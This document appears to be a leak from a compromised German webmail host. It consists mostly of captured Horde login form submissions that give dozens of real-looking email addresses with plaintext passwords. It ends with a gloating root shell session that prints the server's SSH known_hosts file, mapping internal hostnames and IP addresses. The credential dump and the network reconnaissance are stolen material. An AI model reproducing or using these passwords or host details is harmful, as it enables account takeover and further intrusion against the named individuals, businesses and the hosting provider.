actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=PJT@lmtc-ger.de&pass=lmtcxyz56&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=matthias@vohs.de&pass=porky62&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@vohs.de&pass=porky62&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=andre@i-baum.de&pass=techido&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=nicole@weberei-rockt.de&pass=31584&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=nicole@weberei-rockt.de&pass=31584&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=storpi@wild-bikes.de&pass=asparagus&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=storpi@wild-bikes.de&pass=bence2004&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=julian%40echoes-online.de&pass=stuh2s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=michaela.niebur@rfv-harsewinkel.de&pass=michaela&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.
de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=andre@i-baum.de&pass=techido&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=gmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@vfm-service.de&pass=moppel&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@4pfoten-online.de&pass=tomphil&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=dgmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@aegidius-choere.de&pass=konzert&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=gmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=mail@lars-lehmann.com&pass=gmodell&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=ralf%40duddek.de&pass=Post.3D&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=julian%40echoes-online.de&pass=stuh2s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=julian%40echoes-online.de&pass=stuh2s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40christopher-kunz.de&pass=Satan666&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
webby:/var/log/httpd# buahahaha
bash: buahahaha: command not found
webby:/var/log/httpd# cd ~/.ssh/
webby:~/.ssh# cat known_hosts
ffm-game11,62.4.81.250 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
62.4.81.235 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
sturmlauf.stormix.de,195.71.123.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA43h5VP1bJFyQWc5odgav8AoBGd1pPbOIaG84V4QhSe0P/QkAnz+YjTGsl7mekEi1ZUwATB/f8bVZegYrEMFqwXlddpJRCdBMwjldipgb4EaWZPinfc7cyU58V8kzYL0nw8taL1v8TbX9RBVZSFjMuBIE7o/yN0bQjrYOdlpxl6M=
ffm-game10.stormix.de,62.4.81.249 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8=
rush.stormix.de,62.4.81.220 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArQiBOnY8Ngy18FFaX5qwddzBzjIqzp375uk3fQPhIeuAjNwDym9OfeYsI0sxp1Luqs5H7wY2hqxQ8S0oAH34z3ZN9caIe8c4QDWUiJphOlpMt5QJIvMlBmlG4toB5F89ViSWXbv+5JZ6OxfCBLbAYP67vRvrO14sNkL5LHoszuM=
deathstar.de-punkt.de,62.4.81.205 ssh-dss AAAAB3NzaC1kc3MAAACBAMINwOYABg7UBiZFJQWKzQRHr5HtXiJ2J8yES+JCBJOjOcKcPnwY73VuZYIAyJFZ0oWLwgqIMVwiOvTVbaHEOmis2rtELeogxkx2R5Sr6Z2ryr7AXpqqvyf2s9K8kSo27JRHtNeSDfGoXp33Qgg9r8lZpvh/Z9ea5gP1067zebCRAAAAFQDzEH96dKrKcFxcpUiRGQT7LmAJoQAAAIEAwI9CWyQR1jOxglkSYSNcDfQ6bqsDk8kHVtGnwbxDvrt2nLy9HYSgrAdjVYb4DgvmWbSIEs5FCi+ans8DMcDQacLPxXPGSspMLSKzmSB7u1qwI+xXRNpyf7VbNz5J6KppXlfcxEcbng2E98pTiBmoxPB1bLf4ReK7vcC0390cJk4AAACBALZTQjSGRTCVYiolXlcY2zWEwVNcNkcRso7F4F77wqshhqdaFzXF8HxSBmdjzPG7Y70pe7RHagWiXLJm0RfbhzmW6wy7UWfPzIiWv210PwSHFa1q2WmiRVj5cc8280Ajr09JueA0bPyFwOZuId3oayHEjjX8lTg3YBWuWxbaM9c5
rush ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArQiBOnY8Ngy18FFaX5qwddzBzjIqzp375uk3fQPhIeuAjNwDym9OfeYsI0sxp1Luqs5H7wY2hqxQ8S0oAH34z3ZN9caIe8c4QDWUiJphOlpMt5QJIvMlBmlG4toB5F89ViSWXbv+5JZ6OxfCBLbAYP67vRvrO14sNkL5LHoszuM=
manny.de-punkt.de,62.4.81.203 ssh-dss AAAAB3NzaC1kc3MAAACBAKCIkWFVWVZPpGsea/JsS2rTAr2+UW/ycHE2WoxqiPSBecIWOot+kyKIaysa0L50hTaH5C7BhO6xu8aPWzR4Mh5/J9hj0cKGly/glGxqHXLjHaRiy5z3JEyiHtKgu5diqUiakOsQ4gIxhIELeAR8injjlW+KqAoCh+09lbLlvqq1AAAAFQCFcdtg6QTvN2TN9hupgnDfEQxlSwAAAIAsE4bHmWUFTF/t19WhpQnsn+gAhHjr1wqs9tEtILWoQKqYyIHXeNI3KIOSPcosn/0DSHzUc80FyA2fX/+qGMpzA3UkSeW6vX/d/RlOu26xc9KRc1jqZkE6/0Mqz3msUj9VUhMXOEEfkpwiETo136dJSFwKA5yWP+vtjjsh+0lE5QAAAIBJKJgBbWMwIsuX6GmdrgLPdJUzGj8qmpRhAxXiB6nBnz1ebfanQw0tB/4nOo81WEubFAvq17GbRrxu83f8WT8NrZJIrJjyah5Y5KqxJcx7/Xf/1Tbfh8m1bW2uNrOPtDSmyZ+/Hmqa0VsGzwqmniw/beCKfBgh4P52UYnL7tyjKQ==
deathstar ssh-dss AAAAB3NzaC1kc3MAAACBAMINwOYABg7UBiZFJQWKzQRHr5HtXiJ2J8yES+JCBJOjOcKcPnwY73VuZYIAyJFZ0oWLwgqIMVwiOvTVbaHEOmis2rtELeogxkx2R5Sr6Z2ryr7AXpqqvyf2s9K8kSo27JRHtNeSDfGoXp33Qgg9r8lZpvh/Z9ea5gP1067zebCRAAAAFQDzEH96dKrKcFxcpUiRGQT7LmAJoQAAAIEAwI9CWyQR1jOxglkSYSNcDfQ6bqsDk8kHVtGnwbxDvrt2nLy9HYSgrAdjVYb4DgvmWbSIEs5FCi+ans8DMcDQacLPxXPGSspMLSKzmSB7u1qwI+xXRNpyf7VbNz5J6KppXlfcxEcbng2E98pTiBmoxPB1bLf4ReK7vcC0390cJk4AAACBALZTQjSGRTCVYiolXlcY2zWEwVNcNkcRso7F4F77wqshhqdaFzXF8HxSBmdjzPG7Y70pe7RHagWiXLJm0RfbhzmW6wy7UWfPzIiWv210PwSHFa1q2WmiRVj5cc8280Ajr09JueA0bPyFwOZuId3oayHEjjX8lTg3YBWuWxbaM9c5
deathstar.de-punkt.e ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEArQiBOnY8Ngy18FFaX5qwddzBzjIqzp375uk3fQPhIeuAjNwDym9OfeYsI0sxp1Luqs5H7wY2hqxQ8S0oAH34z3ZN9caIe8c4QDWUiJphOlpMt5QJIvMlBmlG4toB5F89ViSWXbv+5JZ6OxfCBLbAYP67vRvrO14sNkL5LHoszuM=
manny ssh-dss AAAAB3NzaC1kc3MAAACBAKCIkWFVWVZPpGsea/JsS2rTAr2+UW/ycHE2WoxqiPSBecIWOot+kyKIaysa0L50hTaH5C7BhO6xu8aPWzR4Mh5/J9hj0cKGly/glGxqHXLjHaRiy5z3JEyiHtKgu5diqUiakOsQ4gIxhIELeAR8injjlW+KqAoCh+09lbLlvqq1AAAAFQCFcdtg6QTvN2TN9hupgnDfEQxlSwAAAIAsE4bHmWUFTF/t19WhpQnsn+gAhHjr1wqs9tEtILWoQKqYyIHXeNI3KIOSPcosn/0DSHzUc80FyA2fX/+qGMpzA3UkSeW6vX/d/RlOu26xc9KRc1jqZkE6/0Mqz3msUj9VUhMXOEEfkpwiETo136dJSFwKA5yWP+vtjjsh+0lE5QAAAIBJKJgBbWMwIsuX6GmdrgLPdJUzGj8qmpRhAxXiB6nBnz1ebfanQw0tB/4nOo81WEubFAvq17GbRrxu83f8WT8NrZJIrJjyah5Y5KqxJcx7/Xf/1Tbfh8m1bW2uNrOPtDSmyZ+/Hmqa0VsGzwqmniw/beCKfBgh4P52UYnL7tyjKQ==
62.4.81.236 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAs9ep0COSHAtln2kw+P4BcgPNq2xACEe9mC1tiwqucG5Ug4sWxbIfr8tfLKGgGTJlb5lvq0aaH2L1Gb6VOXSW0zgpqhZ+K1NppOI5V3y6U6ULjp/HuvmppELJCNY1A1BOef3Ara+TaYk1kZsLoVRC69pRFk+ueaF16rT1CJQNEk0=
ffm-game21 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAs9ep0COSHAtln2kw+P4BcgPNq2xACEe9mC1tiwqucG5Ug4sWxbIfr8tfLKGgGTJlb5lvq0aaH2L1Gb6VOXSW0zgpqhZ+K1NppOI5V3y6U6ULjp/HuvmppELJCNY1A1BOef3Ara+TaYk1kZsLoVRC69pRFk+ueaF16rT1CJQNEk0=
sumse.connect-gt.net,62.52.24.130 ssh-dss AAAAB3NzaC1kc3MAAACBAM+5qglcliqEY+igirYjTGjIYeAp5RWXOQ8Am+st0xKWLnTvy4UcxUC0HJ946eTBao/L0E3x79hyqK05yxSXahlI/k/62murkxwoK0+x8lPK4wLTziJRGgM+0nvFKExjfszFbkcGP8BXq1dF4AIw2qbBJvJqzB5v8Lce1pRGapNHAAAAFQD365UkuxqZVouKOovdxuNKQpJo8wAAAIB01xfapBY2ss58ySi/6Fy68V/pyRuEqAyNybgBrCpAfh52TFQlprM4mRoLijnnyTlRgZcd2kEJqE9YFvtKWuFIahH6OP7O6xZ3oKXm3gt3uVYBPT2y+pyoZhgHts72KDzI/t+BNGxSL9qlatDcgAfkWmG72S5CBGXLiEtBjc8kpQAAAIBU4ry+YTQUgNGjYmoGfNw8btRpw2xnu/OcufXnT7DZ3ZU20SvynM2FclhWAXPipeYwQqMTWqRT6GAk7Td/HCfH00yCuSEpBE7KZuCMr5w9vhVdq+LANOiCT9cohQm0EJhJ5FN1lnwHvC0xPfORQiIb7tL4YiSxNmv/A44AWubTeQ==
ns2.de-punkt.de,198.22.51.45 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAy1DsjdxVavgAGn8ZYN51msPYP5wXboBTvnjV6NKb7HFCXF+jYf+19lmwsGKTal71P04ERaX2phDYFTA0E+fXsp30edGq0Abk5OvKdUUQahhWCJdZEHwSPyyd51KFOedvsLCrLiFVy3GT/hxFSRuVrx9ZzMRarsVXfFP/LrQ9I3U=
endor.de-punkt.de,62.52.24.132 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApy3YTikLw41LC6fc7vJEiSndPruR/gpfyqWHo4Hza5+x6stWzu9/ipm6dIp341rgRHks3KVaXq0kxWbalWHdDUwlsvVJiMnQrAUeczd82o/4J/Ntno/Abyg99l8GRgMKVQzFRGXfpKaqjGeDWoylofCYeRhI82ZiEH/Pf2ZiX3U=
62.4.81.206 ssh-dss AAAAB3NzaC1kc3MAAACBAMINwOYABg7UBiZFJQWKzQRHr5HtXiJ2J8yES+JCBJOjOcKcPnwY73VuZYIAyJFZ0oWLwgqIMVwiOvTVbaHEOmis2rtELeogxkx2R5Sr6Z2ryr7AXpqqvyf2s9K8kSo27JRHtNeSDfGoXp33Qgg9r8lZpvh/Z9ea5gP1067zebCRAAAAFQDzEH96dKrKcFxcpUiRGQT7LmAJoQAAAIEAwI9CWyQR1jOxglkSYSNcDfQ6bqsDk8kHVtGnwbxDvrt2nLy9HYSgrAdjVYb4DgvmWbSIEs5FCi+ans8DMcDQacLPxXPGSspMLSKzmSB7u1qwI+xXRNpyf7VbNz5J6KppXlfcxEcbng2E98pTiBmoxPB1bLf4ReK7vcC0390cJk4AAACBALZTQjSGRTCVYiolXlcY2zWEwVNcNkcRso7F4F77wqshhqdaFzXF8HxSBmdjzPG7Y70pe7RHagWiXLJm0RfbhzmW6wy7UWfPzIiWv210PwSHFa1q2WmiRVj5cc8280Ajr09JueA0bPyFwOZuId3oayHEjjX8lTg3YBWuWxbaM9c5
62.4.81.225 ssh-dss AAAAB3NzaC1kc3MAAACBAMINwOYABg7UBiZFJQWKzQRHr5HtXiJ2J8yES+JCBJOjOcKcPnwY73VuZYIAyJFZ0oWLwgqIMVwiOvTVbaHEOmis2rtELeogxkx2R5Sr6Z2ryr7AXpqqvyf2s9K8kSo27JRHtNeSDfGoXp33Qgg9r8lZpvh/Z9ea5gP1067zebCRAAAAFQDzEH96dKrKcFxcpUiRGQT7LmAJoQAAAIEAwI9CWyQR1jOxglkSYSNcDfQ6bqsDk8kHVtGnwbxDvrt2nLy9HYSgrAdjVYb4DgvmWbSIEs5FCi+ans8DMcDQacLPxXPGSspMLSKzmSB7u1qwI+xXRNpyf7VbNz5J6KppXlfcxEcbng2E98pTiBmoxPB1bLf4ReK7vcC0390cJk4AAACBALZTQjSGRTCVYiolXlcY2zWEwVNcNkcRso7F4F77wqshhqdaFzXF8HxSBmdjzPG7Y70pe7RHagWiXLJm0RfbhzmW6wy7UWfPzIiWv210PwSHFa1q2WmiRVj5cc8280Ajr09JueA0bPyFwOZuId3oayHEjjX8lTg3YBWuWxbaM9c5
62.4.81.241 ssh-dss AAAAB3NzaC1kc3MAAACBAN+qxbNLAAWI+4Ehh99Hg2mH8UBDIkmRh9dBOFX3ao+smUnZd6tkiUUEk79k1OBZojvjGZSfJawtv+JZuBkViCgLc8YIwGVAiBfoUfr+3eQgwVBQkkrdSY8aq3GwxowQIB8JnjiUjc2KeSOjcq1D076zrZfY91PPQjYvD0yAeLLnAAAAFQC7Ce03ztN9uBYbPvnzlA/rIYztswAAAIAaKRk8O1GqMSioAvVcyCWVS195X8JSKtXtcqwKj4JeH43esviDZIWnPFdhyEFkFCH/cWfp36sZmnzMNIUXu5bWOLhyH2DV0hv7FS9jBkz3s+xpHhNF8gepz+hzu7nizttiPtecmoA0a5xO/TSqaPS8/rMRepsMq9yzYaA7PRxtBAAAAIA189LEiue9EJGuRMLR29JfMfvDeNIZdv0J9/WBKwLlrYiHwFrtK3C6llc6zcXMJLHc2rxIinjsrut9zZJoYGzUMo26bextGYY3qA4N3UFGbboKNalxSCSe+nRhzaKsb03UWPKKcZseGHfR2ksTgSmSw6zu11FuUhrv++jNeAZuqA==
sumse.conect-gt.net,62.4.81.239 ssh-dss AAAAB3NzaC1kc3MAAACBAPQxCGpztpyX6UA7sohrvp4647MA7gpfF9wCizIRsZho82jBpRBBhdyVeKzrioKr2zHgqSF6tKeP97cpmYwyfpZMxszDZMTokk0Y5m5gKuDk8YcBIHkgTXvzn+i2l/tCF8e3A0adf/D0afY9M0DPP6r41Ko22x91kdqdpp1AhN05AAAAFQCx3lGLmuHWazX48SpGY0KKJkDvnQAAAIEAxYSlLx4rvFyJJ7ryCNkPftY3eO5uSGlPCWCELK4JoAzqqMe1rAHAK7xHlA6BkOK6cpzI1c8gOdMJ7xphniJ6HtVgHk+5SItvKnxjQyIpDL7krq0DnaWXSOuDIOugyTmeRbTiFWqoMCWJ0qbIx8RISz8y9dzGCzcf6ZxdqKG5FZkAAACAMr/dgdHz9v0IVeQof1gNdmmfIP2wyRowbSyLE5qvRkJJ7mitJvRCBunKUnhmO4JsOUaeIWcqeLH1naARU+vjb3BkGNhCP2onCZZUegNeMXeNUyLhryAQuQaQcMG/7zavCOm2c36XwxkWvrYRBkfMbMPNjyEIef6zzjgaTa/FknA=
